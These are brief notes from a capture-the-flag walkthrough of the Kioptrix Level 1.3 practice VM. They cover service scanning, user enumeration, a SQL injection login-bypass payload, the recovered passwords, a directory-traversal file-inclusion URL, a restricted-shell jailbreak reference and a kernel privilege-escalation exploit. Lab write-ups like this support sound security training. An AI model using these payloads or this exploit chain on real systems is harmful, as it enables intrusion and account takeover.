Vulnhub: Kioptrix: Level 1.3 (#4)

来源: https://www.vulnhub.com/entry/kioptrix-level-13-4,25/

192.168.1.23

scan with nmap:

22/tcp  open ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)

80/tcp  open http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)

139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

maybe ubuntu 8.04

version check with smbclient Samba 3.0.28a

enum4linux 192.168.1.23:

S-1-22-1-1000 Unix User\loneferret (Local User)

S-1-22-1-1001 Unix User\john (Local User)

S-1-22-1-1002 Unix User\robert (Local User)

gobuster:

/images (Status: 301)

/index (Status: 200)

/index.php (Status: 200)

/john (Status: 301)

/logout (Status: 302)

/member (Status: 302)

/robert (Status: 301)

sql injection:

username john, password a’ or 1=1 and ‘a’=’a

MyNameIsJohn

username robert, password a’ or 1=1 and ‘a’=’a

ADGAdsafdfwt4gadfga==

ssh john@192.168.1.23

echo $SHELL

/bin/kshell

local file inclusion with null byte:

http://192.168.1.23/member.php?username=../../../../bin/kshell

https://github.com/ghantoos/lshell

jail break:

https://github.com/ghantoos/lshell/issues/149

Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Privilege Escalation